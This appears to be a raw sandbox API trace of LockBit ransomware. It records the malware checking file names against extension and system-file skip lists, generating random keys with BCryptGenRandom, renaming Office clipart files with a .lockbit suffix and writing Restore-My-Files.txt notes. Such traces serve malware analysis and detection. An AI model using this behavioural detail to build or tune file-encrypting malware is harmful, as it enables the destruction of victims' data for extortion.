lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.504] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.505] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.505] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151073.WMF") returned 1 [0144.506] lstrcmpiW (lpString1="ntldr", lpString2="J0151073.WMF") returned 1 [0144.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151073.WMF") returned 1 [0144.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151073.WMF") returned -1 [0144.506] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151073.WMF") returned -1 [0144.506] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151073.WMF") returned 1 [0144.506] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151073.WMF") returned -1 [0144.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned=".WMF" [0144.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.506] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.506] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.507] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.507] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.lockbit") returned 72 [0144.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.508] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.508] malloc (_Size=0x40068) returned 0x3df0008 [0144.508] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13336) returned 1 [0144.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.510] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.515] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.515] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.515] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.516] free (_Block=0x1fa2ed8) [0144.516] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.516] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.516] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151581.WMF", cAlternateFileName="")) returned 1 [0144.516] lstrcmpiW (lpString1=".", lpString2="J0151581.WMF") returned -1 [0144.516] lstrcmpiW (lpString1="..", lpString2="J0151581.WMF") returned -1 [0144.516] PathFindExtensionW (pszPath="J0151581.WMF") returned=".WMF" [0144.516] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.517] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.518] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.518] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151581.WMF") returned 1 [0144.518] lstrcmpiW (lpString1="ntldr", lpString2="J0151581.WMF") returned 1 [0144.518] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151581.WMF") returned 1 [0144.518] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151581.WMF") returned -1 [0144.518] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151581.WMF") returned -1 [0144.519] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151581.WMF") returned 1 [0144.519] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151581.WMF") returned -1 [0144.519] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.519] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned=".WMF" [0144.519] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.519] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.519] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.520] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.520] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.520] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.520] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.520] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.lockbit") returned 72 [0144.520] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.521] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.522] malloc (_Size=0x40068) returned 0x3df0008 [0144.522] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10752) returned 1 [0144.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.523] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.539] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.539] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.539] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0144.540] free (_Block=0x1fa2ed8) [0144.540] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.540] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.540] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x610c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152414.WMF", cAlternateFileName="")) returned 1 [0144.541] lstrcmpiW (lpString1=".", lpString2="J0152414.WMF") returned -1 [0144.541] lstrcmpiW (lpString1="..", lpString2="J0152414.WMF") returned -1 [0144.541] PathFindExtensionW (pszPath="J0152414.WMF") returned=".WMF" [0144.541] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.541] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.542] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.542] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152414.WMF") returned 1 [0144.543] lstrcmpiW (lpString1="ntldr", lpString2="J0152414.WMF") returned 1 [0144.543] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152414.WMF") returned 1 [0144.543] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152414.WMF") returned -1 [0144.543] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152414.WMF") returned -1 [0144.543] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152414.WMF") returned 1 [0144.543] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152414.WMF") returned -1 [0144.543] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.543] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned=".WMF" [0144.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.543] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.543] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.544] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.544] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.lockbit") returned 72 [0144.544] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft 